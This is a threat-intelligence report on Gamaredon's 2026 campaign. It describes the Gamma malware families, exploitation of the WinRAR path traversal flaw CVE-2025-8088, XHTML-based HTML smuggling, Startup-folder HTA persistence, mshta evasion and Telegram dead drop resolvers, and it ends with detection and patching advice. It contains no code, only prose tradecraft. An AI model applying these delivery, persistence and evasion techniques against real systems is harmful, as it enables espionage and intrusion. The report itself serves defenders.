Executive Summary
Gamaredon remains one of the most operationally active nation-state threat groups in the world — not because it is technically the most sophisticated, but because it has relentlessly targeted Ukraine since 2014 and has shown a consistent willingness to absorb new capabilities and adapt its tradecraft as defenders adjust. In early 2026, Sekoia’s Threat Detection and Research team documented a significant evolution in the group’s toolkit: a more modular, more evasive infection chain anchored by exploitation of CVE-2025-8088 in WinRAR, HTML smuggling for delivery, and a five-family malware framework covering every phase of the kill chain under a unified “Gamma” naming taxonomy.
Critically, Gamaredon was not alone in adopting CVE-2025-8088 rapidly after disclosure. Google’s Threat Intelligence Group documented the same vulnerability being exploited in the same timeframe by Sandworm and Turla — two other Russian state-affiliated operators — suggesting a pattern of rapid coordinated or parallel adoption of newly published exploits across Russia’s offensive cyber ecosystem.
The implications for organisations beyond Ukraine are not zero. Gamaredon’s targeting is focused on Ukrainian government, military, and critical infrastructure, but the group’s TTPs — HTML smuggling delivery, Startup folder persistence, Telegram dead drop resolvers — are shared infrastructure patterns that defenders in any sector should be hunting for in their environments.
Group Profile and Attribution
Gamaredon has operated under numerous names across the threat intelligence community: Primitive Bear (CrowdStrike), ACTINIUM (Microsoft, now Aqua Blizzard), Shuckworm (Symantec), UAC-0010 (UA-CERT), and Armageddon (Ukrainian media reporting). The group was publicly attributed to Russia’s Federal Security Service (FSB) by Ukraine’s Security Service (SBU) in 2021, which named specific FSB officers it alleged were responsible for the group’s operations — a level of attribution specificity rarely seen.
Gamaredon has been active since at least 2014, with targeting focused almost exclusively on Ukrainian government ministries, military personnel, law enforcement, and critical infrastructure. Its goals have been remarkably consistent across twelve years: persistent access to Ukrainian networks for intelligence collection, and pre-positioning for potential disruptive operations.
What has changed is the sophistication of the tooling. Gamaredon originally relied on commodity remote access tools — most notably the commercially available Remote Manipulator System RAT — before transitioning to a custom framework internally referred to as “Pteranodon.” Over the following years, Pteranodon fragmented into an increasingly modular collection of distinct components, each optimised for a specific kill chain phase. By January 2026, that evolution had produced the “Gamma” framework documented by Sekoia.
The Gamma Malware Framework
Sekoia has unified Gamaredon’s modular toolset under a single naming taxonomy using the “Gamma” prefix. Five distinct families have been identified:
GammaPhish handles initial access. It is the delivery component — in the 2026 campaign, a weaponised XHTML file sent as a spearphishing attachment. The file embeds a 1×1 pixel tracking request to a Supabase endpoint, silently confirming to the operator that the victim opened the lure before any exploit fires. This telemetry technique dates to at least 2018 within the group’s tradecraft.
GammaLoad is the intermediate staging layer. Fetched after initial access, it functions as a reconnaissance and configuration agent — it fingerprints the host, updates C2 network configuration in the registry using dead drop resolver data, and fetches and executes arbitrary VBScript payloads. The VBScript loaders operate in a four-stage cascade, with each stage designed to update C2 addresses, establish persistence, and prepare the next stage.
GammaWorm handles lateral movement and propagation — primarily via USB drives, allowing the group to move across air-gapped or isolated segments of a target network.
GammaSteel is the data theft component, focused on credential collection and document exfiltration from compromised hosts.
GammaWipe is the destructive payload — a wiper component available for deployment when the operational objective shifts from espionage to disruption.
The modular architecture serves a clear purpose: individual components can be updated, replaced, or withheld depending on the target and the operational phase. Defenders who detect GammaLoad do not automatically have intelligence on GammaSteel unless they can also retrieve and analyse the payloads fetched during a live intrusion.
2026 Campaign: CVE-2025-8088 Exploitation and HTML Smuggling
The campaign Sekoia began tracking in January 2026 — detected by a YARA rule dropped in late December 2025 — represents the group’s most evasive delivery chain to date.
Initial delivery begins with a spearphishing XHTML file. XHTML was chosen over standard HTML because many email security gateways treat XHTML as a document type rather than a potential script host, reducing the probability of automated blocking. The file uses HTML smuggling to deliver a RAR archive to the victim’s machine entirely client-side — the archive is assembled in the browser’s memory from encoded data embedded in the XHTML, bypassing network-level inspection that would otherwise catch a malicious archive download.
CVE-2025-8088 is the mechanism that makes the RAR archive dangerous. The vulnerability is a path traversal flaw in WinRAR patched in version 7.13 that allows a specially crafted archive to extract files to arbitrary filesystem locations, overriding the user-selected extraction destination. The malicious archive presents to the victim as containing a single visible PDF decoy. It actually contains two files: the decoy and a hidden HTA file. The path traversal extracts the HTA directly into the user’s %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup folder — meaning it executes automatically on the next Windows login without requiring any additional user interaction.
Startup persistence via the dropped HTA file is clean and reliable. The HTA invokes mshta.exe with a URL argument that includes a legitimate-looking domain (www.bbc.com) in the path — a deliberate evasion technique designed to blend into network logs where analysts might dismiss a BBC-linked request as benign.
Dead Drop Resolvers via Telegram handle C2 discovery. Rather than embedding hard-coded IP addresses (which defenders can block and which become stale as infrastructure rotates), Gamaredon stores current C2 addresses as content in Telegram channels it controls. GammaLoad reads the channel content to obtain the current server IP before initiating a callback. This pattern makes infrastructure blocking significantly harder — blocking Telegram is operationally unacceptable for most organisations, and the actual C2 IPs rotate on timescales that outpace manual blocklist maintenance.
The VBScript loader cascade operates across four distinct execution stages recovered by Sekoia from forensic artefacts on compromised hosts. Each stage: fingerprints the host, reads and updates the C2 network configuration in the registry from the Telegram-hosted dead drop resolver, fetches a new VBScript payload from the C2, and executes it.
Cross-Operator CVE Adoption: A Russian Pattern
Gamaredon’s use of CVE-2025-8088 is not isolated. Google’s Threat Intelligence Group documented the same vulnerability being exploited in the same timeframe by two other Russian state-affiliated groups: Sandworm (GRU Unit 74455) and Turla (FSB, separate from Gamaredon). The speed at which this flaw moved across three distinct Russian operators after public disclosure is consistent with previous observations of rapid cross-operator exploit sharing within Russia’s state offensive ecosystem, either through shared tooling infrastructure or deliberate coordination.
The practical implication for defenders is that any network with users running unpatched WinRAR should treat the entire CVE-2025-8088 patch cycle as a critical priority — not because of Gamaredon specifically, but because at minimum three distinct and capable Russian operators had working exploitation chains for this vulnerability within weeks of its disclosure.
Targeting and Victim Profile
Gamaredon’s stated and observed targeting remains concentrated on Ukraine. Primary victims include Ukrainian government ministries, military and intelligence personnel, law enforcement agencies, and critical infrastructure operators in the energy and telecommunications sectors. Secondary targeting has occasionally extended to Ukrainian diaspora organisations and to non-Ukrainian entities with significant Ukraine-related contacts.
The group is not known to have conducted significant operations against Western European or North American targets. However, organisations that maintain communication with Ukrainian government counterparts, operate infrastructure relevant to the conflict (including defence contractors, logistics providers, and humanitarian organisations), or have personnel with Ukrainian connections represent an elevated exposure — not because Gamaredon specifically targets the West, but because spearphishing infrastructure may reach these individuals as part of broader targeting campaigns, and a WinRAR installation on any network represents the same exposure regardless of geography.
Defensive Implications
Patch WinRAR immediately. CVE-2025-8088 is patched in version 7.13. Given active exploitation by at least three Russian state-affiliated groups, this patch should be treated with the same urgency as a CISA KEV entry — which it should join if it has not already.
Hunt for XHTML/HTML smuggling delivery. XHTML files and JavaScript-based archive assembly are increasingly common delivery mechanisms that bypass conventional attachment filtering. Email gateway rules should flag XHTML attachments; endpoint telemetry should capture file creation events that do not correlate with user-initiated downloads.
Monitor the Windows Startup folder for unexpected HTA files. Path traversal delivery to %AppData%\...\Startup is a reliable persistence mechanism that generates a distinctive artefact. Endpoint detection rules for HTA files appearing in the Startup directory outside of expected software installations should be in place on all Windows endpoints.
Flag mshta.exe executions with external URL arguments. Legitimate enterprise mshta usage is rare. Any mshta.exe process with a URL argument — particularly one resolving to an IP address rather than a known internal system — should be treated as a high-priority alert.
Block known-bad Telegram API patterns in network egress. If your organisation does not use Telegram for business communications, DNS lookups and TLS connections to api.telegram.org from endpoints are a strong indicator of dead drop resolver activity. This blocking is more operationally feasible than blocking Telegram entirely.
Apply YARA-based hunting for GammaLoad and GammaPhish artefacts. Sekoia has published YARA rules for both components. Running retrospective hunts against EDR telemetry and SIEM data will surface any prior intrusions that predated this detection research.
Gamaredon is not going away. The group’s consistency across twelve years of operations, its willingness to evolve tradecraft in response to defensive coverage, and its place within Russia’s state intelligence apparatus make it a permanent fixture of the threat landscape for any organisation with exposure to the Ukraine conflict or its wider diplomatic and defence context.